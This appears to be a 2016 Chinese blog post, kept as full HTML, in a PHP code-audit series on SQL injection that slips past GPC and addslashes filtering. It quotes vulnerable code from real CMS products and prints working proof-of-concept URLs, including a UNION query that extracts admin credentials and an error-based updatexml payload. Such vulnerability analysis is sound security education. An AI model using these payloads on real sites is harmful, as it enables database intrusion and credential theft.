<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>





  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  




<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="PHP,SQL注入,代码审计," />





  <link rel="alternate" href="http://www.cnbraid.com/atom.xml" title="Braid's Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="0x01 背景现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，比如最经典的整型参数传递，也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护，实则隐藏了很多“后门”～盲点如下：①注入">
<meta property="og:type" content="article">
<meta property="og:title" content="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结前篇">
<meta property="og:url" content="http://www.cnbraid.com/2016/04/29/sql5/index.html">
<meta property="og:site_name" content="Braid's Blog">
<meta property="og:description" content="0x01 背景现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，比如最经典的整型参数传递，也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护，实则隐藏了很多“后门”～盲点如下：①注入">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_01.jpg">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_02.jpg">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_03.jpg">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_03.png">
<meta property="og:updated_time" content="2016-05-03T08:31:12.306Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结前篇">
<meta name="twitter:description" content="0x01 背景现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，比如最经典的整型参数传递，也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护，实则隐藏了很多“后门”～盲点如下：①注入">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结前篇 | Braid's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Braid's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">攻城狮，黑客，网络安全爱好者</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-th fa-fw"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-tags fa-fw"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结前篇
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-04-29T10:35:00+08:00" content="2016-04-29">
              2016-04-29
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/WEB安全/" itemprop="url" rel="index">
                    <span itemprop="name">WEB安全</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/04/29/sql5/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/04/29/sql5/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          
             <span id="/2016/04/29/sql5/" class="leancloud_visitors" data-flag-title="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结前篇">
               &nbsp; | &nbsp;
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">阅读次数 </span>
               <span class="leancloud-visitors-count"></span>
              </span>
          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x01_背景">0x01 背景</h2><p>现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，比如最经典的整型参数传递，也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护，实则隐藏了很多“后门”～<br><strong>盲点如下：</strong><br>①注入点类似id=1这种整型的参数就会完全无视GPC的过滤；<br>②注入点包含键值对的，那么这里只检测了value，对key的过滤就没有防护；<br>③有时候全局的过滤只过滤掉GET、POST和COOKIE，但是没过滤SERVER。<br>附常见的SERVER变量（具体含义自行百度）：QUERY_STRING,X_FORWARDED_FOR,CLIENT_IP,HTTP_HOST,ACCEPT_LANGUAGE<br>思路来源于乌云drops<a href="http://drops.wooyun.org/papers/4544" target="_blank">http://drops.wooyun.org/papers/4544</a><br><a id="more"></a></p>
<h2 id="0x02_环境搭建">0x02 环境搭建</h2><p>环境请自行搜寻和搭建吧，从这篇开始只做分析不提供漏洞测试环境~~</p>
<h2 id="0x03_漏洞分析">0x03 漏洞分析</h2><h3 id="首先是完全无视GPC的数字型的注入，其实仔细总结下发现还是很多可以学习的地方。">首先是<strong>完全无视GPC的数字型的注入</strong>，其实仔细总结下发现还是很多可以学习的地方。</h3><blockquote>
<p>A.传入的参数未做intval转换、构造的sql语句没有单引号保护</p>
</blockquote>
<p>这个还是比较常见的，当初笔者挖到过一些，乌云案例<a href="http://www.wooyun.org/bugs/wooyun-2010-065605" target="_blank" rel="external">http://www.wooyun.org/bugs/wooyun-2010-065605</a><br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="preprocessor">&lt;?php</span></span><br><span class="line"><span class="keyword">require_once</span> <span class="string">"admin/common.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span>(MOBAN_PATH_QZ.<span class="string">"header.html"</span>);</span><br><span class="line"><span class="comment">//这里typeid没有做整形转换</span></span><br><span class="line"><span class="variable">$typeid</span>=<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'typeid'</span>]) ? <span class="variable">$_GET</span>[<span class="string">'typeid'</span>] : <span class="number">1</span>;</span><br><span class="line"><span class="comment">//sql语句没有单引号保护</span></span><br><span class="line"><span class="variable">$type</span>=<span class="variable">$db</span>-&gt;fetch_array(mysql_query(<span class="variable">$sql</span>=<span class="string">"select * from "</span>.<span class="variable">$db</span>-&gt;tablepre.<span class="string">"newstype where newstypeid="</span>.<span class="variable">$typeid</span>));<span class="comment">//typeid参数存在注入，数字型；</span></span><br><span class="line"><span class="preprocessor">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>获取管理员账户密码的POC：</p>
<pre><code>http://localhost/jdy1.5/typeid.php?typeid=1 and 1=2 UNION <span class="operator">SELECT <span class="literal">NULL</span>,(select <span class="keyword">concat</span>(username,<span class="number">0x23</span>,<span class="keyword">password</span>) <span class="keyword">from</span> jdy_admin <span class="keyword">limit</span> <span class="number">1</span>),<span class="literal">NULL</span>,</span>
</code></pre><p><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_01.jpg" alt=""></p>
<blockquote>
<p>B.同一参数在第一个sql里做了单引号保护，紧跟第二个忘记加单引号 </p>
</blockquote>
<p>有幸在Discuz!上看到此类问题，膜拜下雨牛的漏洞<a href="http://www.wooyun.org/bugs/wooyun-2014-079045" target="_blank" rel="external">http://www.wooyun.org/bugs/wooyun-2014-079045</a><br>简单分析下漏洞原理<br>首先$itemid经过的第一条SQL语句如下</p>
<pre><code><span class="variable">$query</span> = $_SGLOBAL[<span class="string">'db'</span>]-&gt;<span class="function"><span class="title">query</span><span class="params">(<span class="string">'SELECT * FROM '</span>.tname(<span class="string">'spacetags'</span>)</span></span>.<span class="string">' WHERE itemid=\''</span>.<span class="variable">$itemid</span>.<span class="string">'\' AND status=\''</span>.<span class="variable">$status</span>.<span class="string">'\''</span>)
</code></pre><p>$itemid是有单引号保护的并且做了select查询，如果查询有结果才会带入到delete中，如果无结果就不执行delete。在数据库里itemid是int类型存储的，所以这里本意是只能提交数字型才能查询出结果，如果不是提交的数字的话那么就查询不出来结果，就不去执行下面的delete语句了。但是由于mysql的类型转换，因为这里储存的是int类型，所以1xxxxx跟1的查询结果是一样的，如下：<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_02.jpg" alt=""><br>然后后面第二条delete的sql语句如下</p>
<pre><code>$_SGLOBAL[<span class="string">'db'</span>]-&gt;query(<span class="string">'DELETE FROM '</span>.tname(<span class="string">'spacetags'</span>).<span class="string">' WHERE itemid='</span>.<span class="variable">$itemid</span>.<span class="string">' AND tagid IN ('</span>.simplode(<span class="variable">$deletetagidarr</span>).<span class="string">') AND status=\''.$status.'</span>\<span class="string">''</span>);
</code></pre><p>这里忘记加单引号了，根据上图我们可以构造获取数据库用户的POC：</p>
<pre><code><span class="label">http</span>://localhost/sup/dan/supesite/<span class="preprocessor">cp</span>.php?ac<span class="label">=news</span>&amp;op<span class="label">=view</span>&amp;<span class="keyword">itemid=4 </span><span class="keyword">and </span><span class="number">1</span>=(updatexml(<span class="number">1</span>,concat()))
</code></pre><p><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_03.jpg" alt=""></p>
<blockquote>
<p>C.php弱类型语言,判断逻辑错误引发注入</p>
</blockquote>
<p>还是雨牛的案例<a href="http://www.wooyun.org/bugs/wooyun-2010-088872" target="_blank" rel="external">http://www.wooyun.org/bugs/wooyun-2010-088872</a><br>这里只讲下漏洞形成的原理<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql5_03.png" alt=""><br>如上图，弱类型语言在逻辑判断上0&lt;1和0 union select 1&lt;1是等价的，都返回True。</p>

      
    </div>

    <div>
      
        
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PHP/" rel="tag">#PHP</a>
          
            <a href="/tags/SQL注入/" rel="tag">#SQL注入</a>
          
            <a href="/tags/代码审计/" rel="tag">#代码审计</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/02/28/sql4/" rel="next" title="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入">
                <i class="fa fa-chevron-left"></i> 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/04/29/sql5/"
           data-title="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结前篇" data-url="http://www.cnbraid.com/2016/04/29/sql5/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/avatar.png"
               alt="Braid" />
          <p class="site-author-name" itemprop="name">Braid</p>
          <p class="site-description motion-element" itemprop="description">web | security | java | jsp | php</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">9</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="http://www.cnbraid.com/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        <div class="links-of-blogroll motion-element">
          
            <div class="links-of-blogroll-title">友情链接</div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://tnt1200.github.io/" target="_blank">Tnt1200</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.iswin.org/" target="_blank">随风</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://bksec.net/" target="_blank">my5t3ry</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://mars.run/" target="_blank">Mars</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.thinkings.org/" target="_blank">从容</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.waitalone.cn/" target="_blank">独自等待</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.hacksb.org/" target="_blank">断笔抚琴</a>
                </li>
              
            </ul>
          
        </div>

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01_背景"><span class="nav-number">1.</span> <span class="nav-text">0x01 背景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02_环境搭建"><span class="nav-number">2.</span> <span class="nav-text">0x02 环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03_漏洞分析"><span class="nav-number">3.</span> <span class="nav-text">0x03 漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#首先是完全无视GPC的数字型的注入，其实仔细总结下发现还是很多可以学习的地方。"><span class="nav-number">3.1.</span> <span class="nav-text">首先是完全无视GPC的数字型的注入，其实仔细总结下发现还是很多可以学习的地方。</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Braid信息安全博客</span>
</div>

<div class="theme-info">
  联系方式：<a class="theme-link" href="mailto:hackbraid@gmail.com">
    hackbraid@gmail.com
  </a></span>
</div>



      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  


  




<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.min.js"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js"></script>

  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/vendors/jquery-scrollintoview/jquery.scrollintoview.min.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"hackbraid"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
  





  
  
  

  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("4mIc01CuAcxNeBtS9VMXLgeW-gzGzoHsz", "gJXfNgx0s7OHWVgJrY5WVs7Y");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

</body>
</html>
